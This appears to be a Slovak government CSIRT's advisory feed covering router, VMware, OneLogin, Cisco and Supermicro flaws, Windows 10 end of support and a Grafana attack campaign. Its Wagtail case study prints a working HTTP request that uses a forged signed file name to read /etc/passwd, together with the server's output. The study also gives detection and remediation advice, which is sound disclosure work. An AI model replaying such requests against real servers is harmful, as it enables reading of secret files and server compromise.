Spoločnosť DrayTek vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť viacerých routerov Vigor. CVE-2025-10547 možno zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Routery DrayTek Vigor1000B s firmvérom vo verzii staršej ako 4.4.3.6
Routery DrayTek Vigor2962, Vigor3910 a Vigor3912 s firmvérom vo verzii staršej ako 4.4.3.6 alebo 4.4.5.1
Routery DrayTek Vigor2135, Vigor2763, Vigor2765, Vigor2766, Vigor2865 Series, Vigor2865 LTE Series, Vigor2865L-5G Series, Vigor2866 Series, Vigor2866 LTE Series, Vigor2927 Series, Vigor2927 LTE Series a Vigor2927L-5G Series s firmvérom vo verzii staršej ako 4.5.1
Routery DrayTek Vigor2915 Series s firmvérom vo verzii staršej ako 4.4.6.1
Routery DrayTek Vigor2862 Series, Vigor2862 LTE Series, Vigor2926 Series a Vigor2926 LTE Series s firmvérom vo verzii staršej ako 3.9.9.12
Routery DrayTek Vigor2952, Vigor2952P a Vigor3220 s firmvérom vo verzii staršej ako 3.9.8.8
Routery DrayTek Vigor2860 Series, Vigor2860 LTE Series, Vigor2925 Series a Vigor2925 LTE Series s firmvérom vo verzii staršej ako 3.9.8.6
Routery DrayTek Vigor2133 Series, Vigor2762 Series aVigor2832 Series s firmvérom vo verzii staršej ako 3.9.9.4
Routery DrayTek Vigor2620 Series a VigorLTE 200n s firmvérom vo verzii staršej ako 3.9.9.5

Opis zraniteľnosti:

CVE-2025-10547 (CVSSv3.1 skóre 8,8)

Vysoko závažná zraniteľnosť CVE-2025-10547 sa nachádza vo webovom používateľskom rozhraní (WebUI) a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP/HTTPS požiadaviek mohol zneužiť na poškodenie obsahu pamäte, zneprístupnenie služby a vzdialené vykonanie kódu. Chyba súvisí s neinicializovanou hodnotou na zásobníku a dovoľuje použiť funkciu free() na ľubovoľnom mieste pamäte.

Pozn.: Routery DrayTek Vigor sú rozšírené najmä v infraštruktúre malých a stredných podnikov a telekomunikačných operátorov.

Možné škody:

Zneprístupnenie služby (DoS)
Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame bezodkladnú aktualizáciu firmvéru Vigor routerov na verzie špecifikované výrobcom, ktoré môžete nájsť aj v časti „Zraniteľné systémy“ tohto varovania. Výrobca okrem aktualizácie systémov odporúča limitovať prístup k webovému rozhraniu len na dôveryhodné IP adresy. Používateľské a administrátorské rozhrania sieťových prvkov by nemali byť prevádzkované voľne prístupné z internetu.

Zdroje:

Závažné zraniteľnosti vo VMware NSX a vCenter umožňujú enumeráciu používateľov a injekciu SMTP

Marian Danko — Fri, 10 Oct 2025 15:27:33 +0000

Spoločnosť Broadcom vydala bezpečnostné aktualizácie VMware NSX a VMware vCenter, ktoré opravujú 3 vysoko závažné zraniteľnosti. Zraniteľnosti v NSX možno zneužiť na enumeráciu používateľov a následnú realizáciu brute-force alebo slovníkových útokov. Zraniteľnosť vo VMware vCenter umožňuje injektovať hlavičky SMTP.

Zraniteľné systémy:

vCenter:

VMware vCenter 8.0 bez bezpečnostnej záplaty 8.0 U3g
VMware vCenter 7.0 bez bezpečnostnej záplaty 7.0 U3w
VMware Cloud Foundation, VMware vSphere Foundation 9.X.X.X vo verziách starších ako 9.0.1.0
VMware Cloud Foundation 5.X vo verziách starších ako 5.2.2
VMware Cloud Foundation 4.5.X bez upgradu na 7.0 U3w
VMware Telco Cloud Platform 5.X, 4.X, 3.x, 2.X bez bezpečnostnej záplaty KB411508
VMware Telco Cloud Infrastructure 3.X, 2.X bez bezpečnostnej záplaty KB411508

NSX:

VMware NSX 4.2.X vo verziách starších ako 4.2.2.2, 4.2.3.1
VMware NSX 4.1.X, 4.0.X vo verziách starších ako 4.1.2.7
NSX-T 3.X vo verziách starších ako 3.2.4.3
VMware Cloud Foundation, VMware vSphere Foundation 9.X.X.X vo verziách starších ako 9.0.1.0
VMware Cloud Foundation 5.X bez bezpečnostnej záplaty KB88287
VMware Cloud Foundation 4.5.X bez bezpečnostnej záplaty KB88287
VMware Telco Cloud Infrastructure 3.X, 2.X bez bezpečnostnej záplaty KB411518
VMware Telco Cloud Platform 5.X, 4.X, 3.X bez bezpečnostnej záplaty KB411518

Pozn.: NSX a vCenter sú súčasťou VMware Cloud Foundation, VMware vSphere Foundation a VMware Telco Cloud, ktoré umožňuje prevádzkovanie aplikácií v privátnych alebo hybridných cloudoch.

Opis zraniteľnosti:

Centralizovaná platforma VMware vCenter:

CVE-2025-41250 (CVSSv3.1 skóre 8,5)

Nedostatočné overovaní SMTP hlavičiek by vzdialený autentifikovaný útočník s oprávneniami na vytváranie plánovaných úloh mohol zneužiť na modifikáciu notifikačných e-mailov zasielaných ohľadne plánovaných úloh.

Sieťová virtualizačná platforma VMware NSX:

CVE-2025-41251 (CVSSv3.1 skóre 8,1)

CVE-2025-41251 spočíva v nedostatočnom zabezpečení mechanizmu pre obnovu hesla, ktorú by vzdialený neautentifikovaný útočník mohol zneužiť na enumeráciu používateľských účtov.

CVE-2025-41252 (CVSSv3.1 skóre 7,5)

Bližšie nešpecifikovanú vysoko závažnú zraniteľnosť v NSX taktiež možno bez autentifikácie zneužiť na enumeráciu používateľských účtov.

Útočník by používateľské účty identifikované enumeráciou mohol zneužiť v rámci brute-force alebo slovníkových útokov, ktoré by v prípade úspešnosti viedli k získaniu neoprávneného prístupu do systému. Zraniteľnosti vo VMware NSX boli odhalené americkou NSA.

Možné škody:

Neoprávnená zmena v systéme
Neoprávnený prístup k citlivým údajom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie:

VMware vCenter 7.0 U3w, 8.0 U3g alebo 9.0.1.0
VMware Cloud Foundation, VMware vSphere Foundation 9.0.1.0
VMware Cloud Foundation 5.2.2 alebo 7.0 U3w
VMware Telco Cloud Platform 5.X, 4.X, 3.x, 2.X s bezpečnostnou záplatou KB411508
VMware Telco Cloud Infrastructure 3.x, 2.X s bezpečnostnou záplatou KB411508
VMware NSX 4.2.2.2, 4.2.3.1 alebo 4.1.2.7
NSX-T 3.X vo verziách starších ako 3.2.4.3
VMware Cloud Foundation 5.X s bezpečnostnou záplatou KB88287
VMware Cloud Foundation 4.5.X s bezpečnostnou záplatou KB88287
VMware Telco Cloud Infrastructure 3.X, 2.X s bezpečnostnou záplatou KB411518
VMware Telco Cloud Platform 5.X, 4.X, 3.X s bezpečnostnou záplatou KB411518

Zdroje:

Zraniteľnosť riešenia OneLogin IAM možno zneužiť na extrakciu tajných hodnôt OIDC

Marian Danko — Fri, 10 Oct 2025 15:24:11 +0000

Spoločnosť One Identity vydala bezpečnostné aktualizácie svojho IAM (Identity and Access Management) riešenia OneLogin, ktoré opravujú zraniteľnosť vysokej závažnosti. CVE-2025-59363 umožňuje enumeráciu aplikácií a získanie tajných hodnôt OIDC (OpenID Connect). Tie možno následne zneužiť na získanie neoprávneného prístupu do systému.

Zraniteľné systémy:

One Identity OneLogin vo verziách starších ako 2025.3.0

Opis zraniteľnosti:

CVE-2025-59363 (CVSSv3.1 skóre 7,7)

Vysoko závažná zraniteľnosť s identifikátorom CVE-2025-59363 spočíva v nedostatočnej implementácii bezpečnostných mechanizmov v rámci API rozhrania. Vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených API požiadaviek na /api/2/apps mohol zneužiť na enumeráciu a získanie tajných hodnôt OIDC (OpenID Connect) všetkých aplikácií v rámci tenanta OneLogin. Exfiltrované údaje by útočníci následne mohli zneužiť na impersonáciu používateľov, neoprávnený prístup do systémov a laterálny pohyb v infraštruktúre.

Pozn.: Na uvedenú zraniteľnosť je v súčasnosti dostupný Proof of Concept kód demonštrujúci spôsob jej zneužitia.

Možné škody:

Neoprávnený prístup k citlivým údajom
Neoprávnený prístup do systému
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame bezodkladnú aktualizáciu OneLogin na verziu 2025.3.0 a revokáciu všetkých tajných hodnôt, ktoré mohli uniknúť. Taktiež odporúčame vykonať kontrolu logov za účelom identifikácie pokusov o zneužitie zraniteľnosti.

Zdroje:

Končí podpora pre Windows 10. Čo ďalej?

Marian Danko — Thu, 09 Oct 2025 09:18:30 +0000

Spoločnosť Microsoft tento rok plánovane ukončí podporu pre všetky verzie Windows 10. Po 14. októbri 2025 už tieto produkty nebudú dostávať aktualizácie zabezpečenia, aktualizácie nesúvisiace so zabezpečením, opravy chýb, technickú podporu a ani aktualizácie technického obsahu online. Po rokovaní s organizáciou Euroconsumers však v Európskom hospodárskom priestore predĺži pre nekomerčných používateľov bezplatnú podporu systémov Windows 10 o jeden rok, teda do októbra 2026. Spoločnosť to uskutoční poskytnutím svojho programu predĺženej podpory ESU (Extended Security Updates) pre spotrebiteľov zdarma.

Nekomerční používatelia budú dostávať bezpečnostné aktualizácie pre Windows 10 verzie 22H2 Home, Professional, Pro Education alebo Workstations do 13. októbra 2026. Podmienkou je prihlásenie sa do konta Microsoft. Konto musí byť správcovské a nemôže byť detské. Zaregistrovať do ESU sa môžete priamo cez službu Windows Update, kedykoľvek v priebehu jeho existencie.

Microsoft bezplatnú registráciu do programu ESU pre spotrebiteľov nebude ponúkať pre komerčné zariadenia v nasledujúcich scenároch:

Zariadenia v celoobrazovkovom režime.
Zariadenia pripojené k doméne služby Active Directory alebo zariadenia, ktoré sú pripojené k Microsoft Entra.
Zariadenia, ktoré sú registrované v Microsoft Entra, ale môžu využívať program ESU pre spotrebiteľov.
Zariadenia zaregistrované v službe správy mobilných zariadení (MDM).
Zariadenia, ktoré už majú licenciu programu ESU.
Ak je zariadenie zaregistrované v programe ESU pre spotrebiteľov a potom sa zapojí do jedného z vyššie uvedených scenárov ESU pre komerčné použitie, bude registrácia do programu ESU pre spotrebiteľov na zariadení pozastavená, kým sa už nebude používať ako komerčné zariadenie.

Pokiaľ zariadenie nemá nárok na bezplatnú registráciu do programu ESU pre spotrebiteľov, alebo nechcete využívať konto Microsoft, môžete predĺženú podporu získať za poplatok 30 USD za zariadenie pre nekomerčných a 61 USD pre komerčných používateľov. Microsoft ponúka zľavu 90% na podporu ESU špeciálne pre školy.

Odporúčania:

Administrátorom a používateľom systému Windows 10 odporúčame prejsť na novšiu verziu operačného systému alebo využívať rozšírenú podporu ESU (Extended Security Updates), pre ktorú je potrebné

[Nekomerčné zariadenia] Zaregistrovať sa na danom zariadení cez konto Microsoft a ostať prihlásený týmto kontom. Viac informácií nájdete na stránke výrobcu.
[Komerčné zariadenia] Zakúpiť si program ESU za 61 USD. Viac informácií nájdete na stránke výrobcu.

Zdroje:

Kampaň zneužívajúca kritickú zraniteľnosť Grafana zasahuje Slovensko

Marian Danko — Tue, 07 Oct 2025 12:54:56 +0000

Aktuálna situácia:

Dňa 28. septembra 2025 zaznamenala spoločnosť GreyNoise výrazný nárast pokusov o zneužitie zero-day zraniteľnosti CVE‑2021‑43798 v nástroji Grafana, ktorý umožňuje útočníkovi využívať možnosť prechádzania adresárovej štruktúry (path traversal). Celkom 110 unikátnych IP adries sa v ten deň pokúsilo o útok voči monitorovaným inštanciám. Všetky identifikované IP adresy sú klasifikované ako škodlivé.

Opis útoku/kampane:

CVE‑2021‑43798 umožňuje prechádzanie adresárovej štruktúry. Pomocou slovníkového útoku, v ktorom útočník háda názvy modulov využitých v bežiacej inštancii Grafana, vie nájsť adresu nainštalovaného modulu, ktorú dokáže zneužiť na prístup k citlivým súborom na serveri.

V aktivitách z 28. septembra bol pozorovaný vzorec koordinovaného útoku:

110 unikátnych IP adries v priebehu jedného dňa.
Cieľové destinácie útokov: Spojené štáty, Slovensko a Taiwan.
Aktéri hrozieb využívajú IP adresy, ktoré podľa geolokácie patria nasledujúcim krajinám: Bangladéš (107 IP), Čína (2 IP) a Nemecko (1 IP).
105 zo 107 IP z Bangladéša cielených primárne na americké koncové body.
Väčšina IP adries bola prvýkrát zaznamenaná priamo v deň útoku.
Jednotné použitie sieťových odtlačkov a využitie spoločných nástrojov naznačujú spoločný zoznam cieľových systémov.

Nie je známe či útočníci hľadali konkrétne citlivé súbory no z povahy útoku je možné zneužiť zraniteľné verzie aj ako vstupný bod pre ďalšie útoky alebo testovanie účinnosti útoku do budúcna.

Kampaň má dosah aj na územie Slovenskej republiky, preto odporúčame administrátorom prijať nasledovné odporúčania.

Odporúčania:
Administrátorom odporúčame bezodkladnú bezpečnostnú aktualizáciu nástroja Grafana na stále podporované verzie, t.j. v dobe písania článku minimálne verzia 11. V systémoch, ktoré používajú verziu 8 a prechod na novšiu nie je možný, odporúčame bezodkladnú aktualizáciu na verzie obsahujúce záplatu t.j. 8.3.1, 8.2.7, 8.1.8, alebo 8.0.7 (podľa produkčných požiadaviek), aj pokiaľ nie sú priamo dostupné z internetu. Treba však zdôrazniť, že prevádzkovať nepodporovaný softvér v produkčnom prostredí aj bez prístupu na verejný internet je závažné bezpečnostné riziko.

Zdroje:

Keď sa uniknutý SECRET_KEY platformy Django stane horším: prípadová štúdia Wagtail

Marian Danko — Tue, 07 Oct 2025 12:21:38 +0000

Úvod

V ekosystéme Django je SECRET_KEY sama o sebe veľmi citlivá hodnota. Jej únik zvyčajne umožňuje útočníkom falšovať tokeny, resetovať heslá alebo kradnúť relácie v určitých konfiguráciách. Pri skúmaní modulu redirects aplikácie Wagtail však náš kolega objavil prípad, keď by únik hodnoty SECRET_KEY mohol eskalovať nad rámec zneužitia používateľa/relácie a umožniť čítanie súborov na strane servera. Python skript na zneužitie tejto zraniteľnosti je k dispozícii na repozitári Github nášho kolegu.

Prehľad zraniteľnosti

Súbor: wagtail/contrib/redirects/tmp_storages.py
Riadok: 72

return os.path.join(tempfile.gettempdir(), self.name)

Hodnota self.name pochádza z podpísaného parametra v požiadavke. Mechanizmus podpisovania síce zabezpečuje integritu, nesanitizuje však obsah. Ak útočník dokáže sfalšovať platné podpisy (čo je možné, ak vlastní Django SECRET_KEY), môže do požiadavky vložiť názvy súborov, ako napríklad /etc/passwd. Kód vloží túto neoverenú hodnotu do cesty súborového systému, čím účinne umožní prechádzanie mimo zamýšľaného dočasného adresára.

Podmienky zneužitia

Pre zneužitie tejto chyby musí útočník:

Poznať Django SECRET_KEY – už v tomto bode ide o závažné narušenie.
Vlastniť platné konto pre Wagtail s oprávnením pridávať presmerovania.
Vytvoriť škodlivý podpísaný názov súboru smerujúce na citlivé súbory.

Ak sú tieto podmienky splnené, útočník môže zo servera exfiltrovať ľubovoľné súbory. Príklad požiadavky obsahujúcej platnú reláciu pre vysoko privilegovaného používateľa:

Požiadavka HTTP:

POST /admin/redirects/import/process/ HTTP/1.1 Host: localhost:8000 Cookie: csrftoken=JnnVucJbHd8qEaLPg1Sgr4jakrqxBJeO; sessionid=1y21vfn0g6thvfp06c2sooiu0symurie Content-Length: 492 Content-Type: multipart/form-data; boundary=58070cece7e28a1b1230238d327e961c --58070cece7e28a1b1230238d327e961c Content-Disposition: form-data; name="csrfmiddlewaretoken" f1Eii97cre31xBWPvNBkysKEXJL0iEAKOeR3CbGdYh1h1BxuBEjqPmTE701nJdEo --58070cece7e28a1b1230238d327e961c Content-Disposition: form-data; name="import_file_name" /etc/passwd:EOyyi1lH0t4QL209IuRxanXgAstgxxxCA3NCAr4JPn8 --58070cece7e28a1b1230238d327e961c Content-Disposition: form-data; name="input_format" 0:DmT0RMY6RdLc70Vt7wiYA32_Cl4z5UK1pBBI_ybYFGE --58070cece7e28a1b1230238d327e961c--

Odpoveď na túto požiadavku obsahuje obsah požadovaného súboru /etc/passwd.

Odpoveď HTTP:

HTTP/1.1 200 OK Server: WSGIServer/0.2 CPython/3.13.3 Content-Type: text/html; charset=utf-8 ... Content-Length: 38988 ...


    ...
        Preview

        
            
                
            
            
                    
                    ...
                    
                    
            
        root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
redis:x:129:131::/var/lib/redis:/usr/sbin/nologin
kali:x:1000:1000::/home/kali:/usr/bin/zsh

    
    ...

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
redis:x:129:131::/var/lib/redis:/usr/sbin/nologin
kali:x:1000:1000::/home/kali:/usr/bin/zsh

Bezpečnostný dopad

Hoci kompromitácia SECRET_KEY je sama o sebe katastrofálna, typické útoky zostávajú na úrovni aplikácie/používateľa (falšovanie relácie, podpisovanie tokenov). Táto zraniteľnosť zvyšuje dopad jej rozšírením na úroveň servera, čím umožňuje prístup k:

Súborom prostredia (.env)
Zdrojovému kódu
Súkromným kľúčom (SSH, prihlasovacie údaje API)
Konfiguračným súborom

Tým sa únik kryptografického kľúča zmení na problém lokálneho začlenenia súboru (LFI).

Príkladový scenár – zverejnený .git a uniknutý SECRET_KEY

Reálny a bežný spôsob, ako môže uniknúť SECRET_KEY, je náhodný „commit“ kódu verejne dostupný na serveri, obsahujúci konfiguračné súbory, adresáre .env a .git, alebo exponovaná záloha. Predstavte si, že vývojár omylom „pushne“ súbor settings.py obsahujúci SECRET_KEY. Útočník, ktorý si naklonuje repozitár alebo získa vypublikované údaje v adresári .git, môže ľahko získať súbor SECRET_KEY a ďalšie citlivé konfiguračné hodnoty.

V tejto situácii sa zraniteľnosť, o ktorej sme hovorili, podstatne zhoršuje. S uniknutým kľúčom SECRET_KEY môže útočník, ktorý tiež ovláda (alebo kompromituje) účet Wagtail s dostatočnými oprávneniami, sfalšovať podpísaný názov súboru a použiť koncový bod importu na čítanie ľubovoľných súborov zo servera. Táto možnosť čítania súborov môže útočníkovi umožniť získať ďalšie tajomstvá – napríklad súbory .env, databázové poverenia, kľúče SSH alebo tokeny API – čo môže následne umožniť úplnú kompromitáciu servera. Stručne povedané: počiatočný únik repozitára, ktorý odhalí SECRET_KEY, môže v kombinácii s nekontrolovaným používaním názvov súborov prerásť do úplného narušenia.

Tipy pre detekciu

Preskenujte históriu „commitov“, či neexistujú také, ktoré obsahujú settings.py, .env alebo iný súbor obsahujúci SECRET_KEY.
Na serveri hľadajte neočakávané prístupy k administrátorským koncovým bodom (koncové body importu, presmerovanie importu) a neobvyklé čítanie súborov webovým procesom.
Skontrolujte v logoch požiadavky na koncový bod importu, ktoré obsahujú neobvyklé reťazce názvov súborov obsahujúce ../, absolútne cesty alebo dlhé segmenty ciest.

Okamžitá náprava pri zistení úniku

Bezodkladne zmeňte SECRET_KEY a počítajte s vedľajšími účinkami (zneplatnite podpísané cookies/tokeny).
Zmeňte všetky ostatné tajomstvá, ktoré sa nachádzajú v repozitári alebo na serveri (heslá k databáze, API kľúče, SSH kľúče).
Odstráňte vypublikované súbory .git resp. akékoľvek citlivé súbory z verejného prístupu a prepíšte históriu, ak je to možné (napr. git filter-repo alebo bfg). Upozorňujeme, že samotné odstránenie súboru z repozitára ho z histórie neodstráni.
Vynúťte zmenu hesiel pre administrátorských používateľov, pokiaľ máte podozrenie na falšovanie relácií alebo tokenov.
Preverte a monitorujte podozrivú aktivitu administrátorov a nové neznáme kľúče zaznamenané v logoch a konfiguračných súboroch.

Hodnotenie CVSS

Zraniteľnosť sme vyhodnotili podľa metodiky CVSS v3.1 nasledovne:

AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N

Base Score: 5.8 (Medium)

Hoci útok vyžaduje vysoké oprávnenia a predchádzajúcu kompromitáciu kľúča SECRET_KEY, má vysoký dopad na dôvernosť kvôli odhaleniu súborov servera.

Širšia lekcia

Tento prípad nie je o tom, že by bol systém Wagtail v štandardne dodávanom nastavení nezabezpečený. Je o tom, že dôvera v kryptografické podpisy nesmie nahradiť základné overovanie vstupov. Aj keď sú parametre podpísané, ich obsah stále potrebuje sanitizáciu. Dôležitá je viacvrstvová obrana (Defense in depth).

Časová línia

2025-09: identifikovaná chyba a nahlásená Wagtail Security.
2025-09: bezpečnostný tím vyhodnotil nález, že sa nejedná o zraniteľnosť (vzhľadom na to, že únik SECRET_KEY je sám o sebe katastrofický), no súhlasil, že kód je potrebné zabezpečiť.

Záver

Hoci si tento problém vyžaduje splnenie viacerých predpokladov a nemožno ho považovať za formálnu zraniteľnosť, poukazuje na málo viditeľnú, ale dôležitú bezpečnostnú lekciu. Vývojári by mali overovať a obmedzovať názvy súborov bez ohľadu na podpisovanie a považovať kľúč SECRET_KEY za kritickú súčasť bezpečnostnej politiky aplikácie.

Mesačný prehľad kritických zraniteľností september 2025

Marian Danko — Mon, 06 Oct 2025 12:01:41 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci september 2025.

Mesačný prehľad – 09/2025 PDF (541 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Vládna jednotka CSIRT spustila sériu špecializovaných školení pre policajných vyšetrovateľov: Spoločne posilňujeme obranu proti kyberkriminalite

Marian Danko — Fri, 03 Oct 2025 13:17:21 +0000

Bratislava/Košice, 30. septembra 2025

Vládna jednotka CSIRT, ktorá patrí pod Ministerstvo investícií, regionálneho rozvoja a informatizácie Slovenskej republiky v spolupráci s odborom počítačovej kriminality a odborom kriminálnej polície Prezídia Policajného zboru, vzdeláva policajtov.

Zaisťovanie digitálnych stôp, bolo prvou témou školenia pre policajných vyšetrovateľov a operatívcov z celého Slovenska, ktoré zorganizovala Vládna jednotka CSIRT súčasne v Bratislave a Košiciach.

Na podujatí sa celkovo zúčastnilo 30 príslušníkov Policajného zboru, ktorí čelia výzvam kybernetickej kriminality v prvej línii.

Odborné školenie slávnostne otvoril štátny tajomník MIRRI SR pre informatizáciu Radoslav Štefánek, ktorý vo svojom príhovore zdôraznil kľúčový význam spolupráce a zdieľania informácií medzi štátom a bezpečnostnými zložkami. Vyzdvihol tiež ochotu a pripravenosť Vládnej jednotky CSIRT aktívne pomáhať orgánom činným v trestnom konaní, a to formou konzultácií, technickej súčinnosti pri zaisťovaní digitálnych dôkazov, OSINT analýz, forenzných šetrení či analýz hardvéru v našom špecializovanom chip-off laboratóriu.

“Veríme, že spolu proti kybernetickej kriminalite prispejeme k ešte lepšej pripravenosti Policajného zboru čeliť moderným hrozbám v digitálnom priestore. Vládna jednotka CSIRT.SK bude aj naďalej spoľahlivým partnerom v budovaní odolnosti našej krajiny proti kybernetickým hrozbám,” zdôraznil štátny tajomník MIRRI SR Radoslav Štefánek.

Cieľom školenia je odovzdať policajtom praktické zručnosti pri vyšetrovaní kybernetických trestných činov.

Odborníci v kybernetickej bezpečnosti poskytli zúčastneným konkrétne poznatky o tom, aké digitálne dáta sú pri vyšetrovaní kľúčové, ako ich efektívne zabezpečiť, a ako postupovať tak, aby boli použiteľné v trestnoprávnom kontexte.

Každý typ kybernetického incidentu si vyžaduje špecifický prístup k zaisťovaniu dôkazov – či už ide o útoky na IT infraštruktúru, webové služby alebo IoT zariadenia. Dôrazne vysvetlili aj správne procesy, zachovanie integrity dát a pochopenie volatility rôznych typov digitálnych stôp.

V prvom bloku sa policajti oboznámili s tým, aké digitálne stopy možno získať zo systémov napadnutých útokom, ale aj z webových a cloudových služieb či bežných smart zariadení. Nasledoval praktický prehľad techník zaisťovania dôkazov pri phishingových útokoch, bez ohľadu na ich formu – e-mail, SMS (smishing), hlasové hovory (vishing), QR kódy (quishing) či správy na sociálnych sieťach.

Týmto školením sa séria iba začína. V nasledujúcich blokoch sa CSIRT.SK zameria na špecifiká iných typov kybernetickej trestnej činnosti – vrátane kompromitácií infraštruktúr, ransomvérových útokov či pokročilých malvérových kampaní. Účastníci si navyše budú môcť vyskúšať získané poznatky priamo v praxi.

Cisco opravilo aktívne zneužívanú zraniteľnosť operačných systémov IOS a IOS XE

Marian Danko — Wed, 01 Oct 2025 15:12:25 +0000

Spoločnosť Cisco vydala bezpečnostné aktualizácie, ktoré opravujú 14 zraniteľností operačných systémov Cisco IOS a IOS XE, z čoho jedna je označená ako aktívne zneužívaná zero-day. CVE-2025-20352 by vzdialený útočník mohol zneužiť na zneprístupnenie služby, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Zariadenia Cisco s operačným systémom Cisco IOS a IOS XE bez inštalovanej záplaty z 24.09.2025
Prepínače Meraki MS390 a Cisco Catalyst 9300 Series s operačným systémom Meraki CS 17 alebo staršou verziou

Pozn.: Zraniteľné sú všetky zariadenia, na ktorých je aktivované SNMP a zraniteľné OID (Object ID) neboli explicitne zakázané v rámci konfigurácie.

Opis zraniteľnosti:

CVE-2025-20352 (CVSSv3.1 skóre 7,7)

CVE-2025-20352 sa nachádza v subsystéme SNMP (Simple Network Management Protocol) a spočíva v pretečení zásobníka. Zraniteľnosť možno zneužiť zaslaním špeciálne vytvorených SNMP paketov prostredníctvom IPv4 alebo IPv6. Vzdialený autentifikovaný útočník by ju mohol zneužiť na zneprístupnenie služby. Vzdialený autentifikovaný útočník s oprávneniami administrátora by ju mohol zneužiť aj na vykonanie kódu a získanie úplnej kontroly nad systémom. Zraniteľnosť v súčasnosti útočníci aktívne zneužívajú.

Pozn.: Na zneužitie zraniteľnosti musí útočník disponovať hodnotou tzv. read-only community string (SNMPv1, SNMPv2c) alebo platnými prihlasovacími údajmi (SNMPv3).

Možné škody:

Zneprístupnenie služby (DoS)
Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame bezodkladne vykonať aktualizáciu systémov. Verziu aktualizácií potrebnú pre konkrétne zariadenie je možné zistiť pomocou nástroja Cisco Software Checker.

V prípade, že aktualizáciu zariadení nie je možné vykonať, zraniteľnosť je možné mitigovať limitovaním prevádzky SNMP len na dôveryhodné zdroje alebo úplným vypnutím SNMP. Administrátori môžu taktiež deaktivovať zraniteľné OID (Object ID) prostredníctvom CLI (Command Line Interface):

snmp-server view NO_BAD_SNMP iso included snmp-server view NO_BAD_SNMP snmpUsmMIB excluded snmp-server view NO_BAD_SNMP snmpVacmMIB excluded snmp-server view NO_BAD_SNMP snmpCommunityMIB excluded snmp-server view NO_BAD_SNMP cafSessionMethodsInfoEntry.2.1.111 excluded snmp-server community mycomm view NO_BAD_SNMP RO

V prípade SNMPv3 použite príkaz:

snmp-server group v3group auth read NO_BAD_SNMP write NO_BAD_SNMP

Zdroje:

Zraniteľnosti v Supermicro BMC možno zneužiť na modifikáciu firmvéru

Marian Danko — Wed, 01 Oct 2025 15:09:45 +0000

Spoločnosť Supermicro vydala bezpečnostné aktualizácie firmvéru BMC (Baseboard Management Controller), ktoré opravujú dve zraniteľnosti vysokej závažnosti. CVE-2025-7937 a CVE-2025-6198 by vzdialený útočník mohol zneužiť na modifikáciu firmvéru zariadenia a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Základné dosky MBD-B12DPT, MBD-B12SPE-CPU-TF, MBD-BH12SSI-M25, MBD-B12DPT-6, MBD-H12SSFF-AN6, MBD-X12DPG-OA6-GD2, MBD-X12DPG-OA6, MBD-B12DPE-6, MBD-B12SPE-CPU-25G, MBD-X12DGQ-R, MBD-X12DPG-QR, MBD-H12DSG-CPU6-TI036, MBD-X12STW-F, MBD-X12STW-TF, MBD-B3ST1-CPU-001, MBD-X13DEM, MBD-X13DET-B, MBD-X13DSF-A, MBD-X13SEDW-F, MBD-X13SEED-F, MBD-X13SEED-SF, MBD-X13SEFR-A, MBD-X13SEM-F, MBD-X13SEM-TF, MBD-X13SET-PT, MBD-X13SEVR-SP13F, MBD-X13OEI-CPU, MBD-B13DEE, MBD-B13DET, MBD-B13SEE-CPU-25G, MBD-B13SEG, MBD-B4SA1-CPU, MBD-B4SC1-CPU, MBD-H13QSH, MBD-H13SRH, MBD-H13SSF, MBD-H13SSH, MBD-G1SMH-G, MBD-G1SMH, MBD-G2DMH-G, MBD-G2DMH-GI, MBD-X13DEH, MBD-X13SAW-F, MBD-X13SAW-TLN4F, MBD-X13SCW-F-B, MBD-X13SCW-F-O, MBD-X13SCW-F, MBD-X14DBM-AP, MBD-X14DBM-APL, MBD-X14DBM-SP, MBD-X14DBT-B, MBD-X14DBT-FAP, MBD-X14DBT-FLAP, MBD-X14QBH+, MBD-X14SBH-AP, MBD-X14SBH, MBD-X14SBM-TF, MBD-X14SBM-TP4F, MBD-X14SDV-20C-SP3F, MBD-X14SDV-32C-SP3F, MBD-X14SDV-36C-SP3F, MBD-X14SDV-36CE-SP3F, MBD-X14SDV-42C-SP3F, MBD-X14SDW-36C-SP9F, MBD-X14SDW-36CE-SP9F, MBD-X14SDW-42C-SP9F, MBD-H13DSG-OM, MBD-B3SD1-20C-25G, MBD-X14SBHM, MBD-B14DBE-AP, MBD-B14DBE, MBD-B14DBT, MBD-B14SBE-CPU-25G, MBD-B14SBE-CPU-AP, MBD-X14DBG-GD, MBD-X14DBG-XAP, MBD-X14SBT-G, MBD-X14SBT-GAP, MBD-H14DSH-TI036, MBD-H14DST-F, MBD-H14DSG-OD, MBD-H14DSG-OM, MBD-X14DBG-MAP, MBD-X14SBGM, MBD-X14DBG-LC+, MBD-X14DBG-LC, MBD-X11DPFF-SNR, MBD-X11DPT-BR, MBB-CMM-003, MBM-CMM-6-01-FI005, MBM-CMM-FIO, MBB-CMM-6, MBM-CMM-6-01-HN004, MBM-CMM-FIO-01-FI005, MBM-CMM-6, MBM-CMM-6-IN001, MBD-X12DPT-B, MBD-X11DGQ, MBD-X11DPD-L, MBD-X11DPD-M25, MBD-X11DPFF-SN, MBD-X11DPL-I, MBD-X11DPS-R, MBD-X11DPS-RE, MBD-X11DPT-L, MBD-X11DSC+, MBD-X11DSF-E, MBD-X11DSF, MBD-X11SCW-F-AM047, MBD-X11SCW-F, MBD-X11SRI-IF bez najnovšej aktualizácie firmvéru

